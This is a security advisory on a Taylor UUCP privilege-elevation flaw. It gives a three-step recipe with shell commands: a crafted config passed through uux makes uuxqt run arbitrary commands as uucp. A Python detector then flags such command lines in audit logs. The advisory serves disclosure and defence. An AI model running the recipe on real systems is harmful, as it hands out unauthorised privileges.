Taylor UUCP Argument Handling Privilege Elevation Vulnerability
Contributed by Zenith Parsec <zen-parse@gmx.net>:

uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile' will use the supplied configuration, without dropping privileges.

1) Make a configuration file that allows any command to be executed, and allows files from anywhere to be copied to anywhere that is writable by uid/gid uucp. ( /tmp/config.uucp )

2) Make a command file with the command you want to be executed. ( /tmp/commands.uucp )

3) Do something like the following:

    $ THISHOST=`uuname -l`
    $ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
    $ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}

The commands in /tmp/commands.uucp file will be executed by uuxqt, with the uid/gid of uucp.
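For detection, the pattern above can be searched for in process-accounting or audit records. The following is an added example, not part of the original advisory or of Taylor UUCP: it flags uux/uucp command lines that name a configuration file outside the site's own directory or copy into the spool. It assumes one command line per record and /etc/uucp/ as the trusted configuration directory; the function names and sample records are constructed for illustration.

```python
import os
import shlex

# Assumption: the site's own UUCP configuration lives here; adjust per system.
TRUSTED_CONFIG_DIRS = ("/etc/uucp/",)
SPOOL_DIR = "/var/spool/uucp/"  # spool location used in the advisory
UUCP_TOOLS = {"uux", "uucp"}

def config_paths(argv):
    """Yield files named by --config=FILE, --config FILE, -I FILE or -IFILE."""
    args = iter(argv)
    for arg in args:
        if arg.startswith("--config="):
            yield arg.split("=", 1)[1]
        elif arg in ("--config", "-I"):  # -I is the short form of --config
            yield next(args, "")
        elif arg.startswith("-I"):
            yield arg[2:]

def findings(cmdline, nested=False):
    """Return the reasons a logged command line deserves review (empty if none)."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in the record: fall back to whitespace
        argv = cmdline.split()
    tool = os.path.basename(argv[0]) if argv else ""
    if tool not in UUCP_TOOLS:
        return []
    out = []
    for path in config_paths(argv[1:]):
        if not os.path.normpath(path).startswith(TRUSTED_CONFIG_DIRS):
            out.append(f"{tool}: caller-supplied config {path}")
    for arg in argv[1:]:
        if tool == "uucp" and os.path.normpath(arg).startswith(SPOOL_DIR):
            out.append(f"uucp: copy target inside spool {arg}")
        elif tool == "uux" and not nested and not arg.startswith("-"):
            out += findings(arg, nested=True)  # the command uux was asked to queue
    return out

# Constructed sample records (not taken from a real system).
SAMPLE_LOG = [
    "uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp "
    "/var/spool/uucp/hostA/X./X.hostAX1337'",
    "/usr/bin/uux -I /etc/uucp/config 'rmail bob'",
    "uucp /home/alice/report.txt 'hostB!~/report.txt'",
]
if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(findings(line) or "ok", "<-", line)
```

Only the first sample record produces findings; the other two are ordinary uux and uucp use.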